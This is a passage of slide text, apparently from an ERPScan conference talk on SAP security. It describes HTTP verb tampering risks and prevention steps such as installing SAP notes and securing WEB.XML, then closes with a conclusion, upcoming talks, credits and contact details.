  • 59. 1  –  Verb  tampering:  Demo   59  
  • 60. 1  –  Verb  tampering:  More  details   If  patched,  can  be  bypassed  by  the  Invoker  servlet!   60  
  • 61. 1  –  Verb  tampering:  Business  risks   Espionage    –  Cri>cal   Sabotage  –  Cri>cal     Fraud    –  Cri>cal   Ease  of  use  –  Very  easy!   61  
  • 62. PrevenHon:   •  Install  SAP  notes  1503579,1616259   •  Install  other  SAP  notes  about  Verb  Tampering  (about  18)   •  Scan  applicaHons  using  ERPScan  WEB.XML  check  tool  or   manually   •  Secure  WEB.XML  by  deleHng  all    <h[p-­‐method>   •  Disable  the  applicaHons  that  are  not  necessary   1st  Place  –  Verb  tampering:  Preven>on   62  
  • 63. Conclusion   It  is  possible  to  be  protected  from  almost  all  those  kinds  of  issues   and  we  are  working  hard  with  SAP  to  make  it  secure     SAP  Guides   It’s  all  in  your  hands   Regular  Security  assessments   ABAP  Code  review   Monitoring  technical  security   Segrega>on  of  Du>es   63  
  • 64. Future  work   Many  of  the  researched  things  cannot  be  disclosed  now  because   of  our  good  relaHonship  with  SAP  Security  Response  Team,  whom  I   would  like  to  thank  for  cooperaHon.  However,  if  you  want  to  see   new  demos  and  0-­‐days,  follow  us  at  @erpscan  and  a[end  the   future  presentaHons:   •  Just4MeeHng    in  July  (Portugal)   •  BlackHat  USA    in  July    (Las  Vegas)   64  
  • 65. Greetz   to   our   crew   who   helped:   Dmitriy   Evdokimov,   Alexey   Sintsov,   Alexey   Tyurin,   Pavel   Kuzmin,  Evgeniy  Neelov.     65  
  • 66.     Web:    www.erpscan.com   e-­‐mail:    info@erpscan.com                                  sales@erpscan.com   Twi3er:    @erpscan                  @sh2kerr   66